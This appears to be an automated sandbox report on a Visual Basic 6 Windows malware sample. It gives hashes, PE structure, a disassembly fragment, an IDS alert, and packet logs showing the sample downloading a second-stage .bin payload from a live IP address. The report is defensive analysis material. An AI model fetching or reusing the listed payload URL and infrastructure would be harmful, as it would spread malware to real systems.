Name	Malicious	Antivirus Detection	Reputation
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.bin	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	low
http://ocsp.sectigo.com0A	RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	RegAsm.exe, 0000000A.00000002.16910783875.000000001FFF2000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://167.114.85.125/go/Jay_uncrypt_rZmowgNiLH235.binP	RegAsm.exe, 0000000A.00000002.16901282156.0000000001340000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://65WgO3Tt3vwSLEL.net	RegAsm.exe, 0000000A.00000002.16911244616.0000000020033000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://aka.ms/hcsadmin	RegAsm.exe, 0000000A.00000002.16915141303.0000000022510000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
167.114.85.125	Canada		16276	unknown	true
208.91.199.223	United States		394695	unknown	false

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	3.92078412945187
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bF7H5z6B1q.exe
File size:	212992
MD5:	87e74af7016e8a9b9304dc537fa093da
SHA1:	7e0a71b9c8d3396c19771c7da01c28a7a3eb93e0
SHA256:	350b35550e10e3ed50b1337e8899ab2eb9c9cbae7c077027f52bab3c5266bb84
SHA512:	08b1af8f928cb5f73f7817ff6317b33d55d668650511761bbd206d5faad674a89bcc55622ba51ab9ed8a940c79cd34e1fe846c6511abf311bafebfbbe3d755ff
SSDEEP:	1536:cWhaegAOJazn5fhO/o3N8GeXGLaS8Bv4ZvYoaaZmiVkweQHOXhtGwM5S58hSAr:laeYWCG7eJBzsXNOhtAu8hSs
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................................Rich............PE..L......U..................... ............... ....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4018fc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x55E9C4F6 [Fri Sep 4 16:21:10 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	776b924fcfd3a36414d026f428f50133

Entrypoint Preview

Instruction
push 00425528h
call 00007F2BA0940565h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+50A66F9Bh], al
imul esp, dword ptr [esi+ecx*2], 928A4885h
push eax
nop
daa
imul eax, dword ptr [eax], 00000000h
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [esi+67h], ch
and byte ptr [eax], ch
inc edx
outsw
jc 00007F2BA09405DEh
jnc 00007F2BA09405E0h
imul ebp, dword ptr [esi+67h], 4E529B00h
sbb byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
inc edi
int3
out 50h, eax
retn 85BBh
jp 00007F2BA09405BBh
mov cl, DBh
push edi
imul eax, dword ptr [ebp+6547357Dh], 26h
cmp dword ptr [esi+01h], ebp
push esp
dec edx
mov seg?, ax
int 37h
je 00007F2BA0940584h
mov bh, 3Ah
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
cmp dword ptr [edx], 02h
add byte ptr [eax+00h], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
jnc 00007F2BA09405E0h
popad
jc 00007F2BA0940572h
or eax, 43000801h
dec esp
inc ebp
dec ebp
inc ebx
dec esp
inc ebp
dec ebp
add byte ptr [ecx], bl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x319c4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33000	0x908	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x12c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30eac	0x31000	False	0.266855668048	data	4.06885184281	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x32000	0xd84	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x33000	0x908	0x1000	False	0.170166015625	data	1.97293268134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x337d8	0x130	data
RT_ICON	0x334f0	0x2e8	data
RT_ICON	0x333c8	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x33398	0x30	data
RT_VERSION	0x33150	0x248	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaObjVar, __vbaCastObjVar, _adj_fpatan, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaVarSetObj, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarLateMemCallLd, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Ophic
FileVersion	1.00.0004
CompanyName	MOrtisClod
Comments	MOrtisClod
ProductName	Epigon
ProductVersion	1.00.0004
OriginalFilename	Ophic.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/22/20-21:58:16.092094	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49768	80	192.168.0.80	167.114.85.125

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 22, 2020 21:58:15.989227057 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.091386080 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.091686964 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.092093945 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.194216013 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.194374084 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.194391966 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.194633961 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.194650888 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.194665909 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.194814920 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.194844961 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.194881916 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.194952965 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.194978952 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.195055962 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.195090055 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.195121050 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.195182085 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.195241928 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.195285082 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.195334911 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.195415020 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.195457935 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.296952009 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.296969891 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.296988964 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297075033 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297147036 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.297184944 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.297256947 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297261953 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.297398090 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297415018 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297436953 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.297552109 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.297594070 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297724962 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297807932 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.297835112 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297907114 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.297924042 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.297995090 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298026085 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298104048 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298129082 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298161983 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298253059 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298331022 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298363924 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298432112 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298477888 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298500061 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298608065 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298626900 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298784018 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.298810005 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298907995 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.298976898 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.299122095 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.399498940 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.399521112 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.399538994 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.399611950 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.399799109 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.399849892 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.399868011 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400043011 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400068045 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400075912 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400190115 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400218964 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400249958 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400306940 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400371075 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400427103 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400461912 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400537968 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400614023 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400640965 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400717020 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400800943 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.400882959 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400899887 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.400994062 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401027918 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401101112 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401135921 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401196003 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401230097 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401282072 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401359081 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401365995 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401479959 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401506901 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401597023 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401609898 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401717901 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401726007 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401839972 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401844978 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.401946068 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.401992083 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402065039 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402117014 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402184963 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402205944 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402302980 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402314901 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402420998 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402435064 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402542114 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402554989 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402661085 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402671099 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402780056 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.402785063 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402896881 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.402904034 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.403017044 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.403023005 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.403136015 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.403137922 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.403254032 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.403258085 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.403373957 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.403376102 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.403491974 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.501965046 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.501981974 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502187014 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502202988 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502274990 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.502337933 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.502393961 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502414942 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502546072 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502629042 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.502630949 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502717018 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.502748013 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502806902 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.502862930 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.502896070 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.502984047 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503061056 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503118038 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503158092 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503223896 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503241062 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503345966 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503350019 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503463984 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503470898 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503582001 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503591061 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503700018 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503707886 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503820896 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503895044 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.503927946 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.503987074 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504039049 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504072905 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504157066 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504168987 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504287004 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504295111 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504406929 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504412889 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504524946 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504533052 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504645109 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504650116 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504770041 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.504770994 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504884005 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.504899025 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505000114 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505012035 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505121946 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505140066 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505240917 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505248070 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505358934 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505429029 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505481005 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505522966 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505594969 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505680084 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505711079 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505801916 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505839109 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.505852938 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.505954981 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506062031 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506069899 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506153107 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506190062 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506251097 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506318092 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506371021 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506422043 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506496906 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506545067 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506576061 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506666899 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506742954 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506828070 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506829023 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.506917953 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.506956100 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507026911 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507051945 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507148027 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507200956 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507251978 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507329941 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507379055 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507452965 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507499933 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507531881 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507615089 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507622004 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507738113 CEST	80	49768	167.114.85.125	192.168.0.80
Apr 22, 2020 21:58:16.507740974 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507857084 CEST	49768	80	192.168.0.80	167.114.85.125
Apr 22, 2020 21:58:16.507859945 CEST	80	49768	167.114.85.125	192.168.0.80
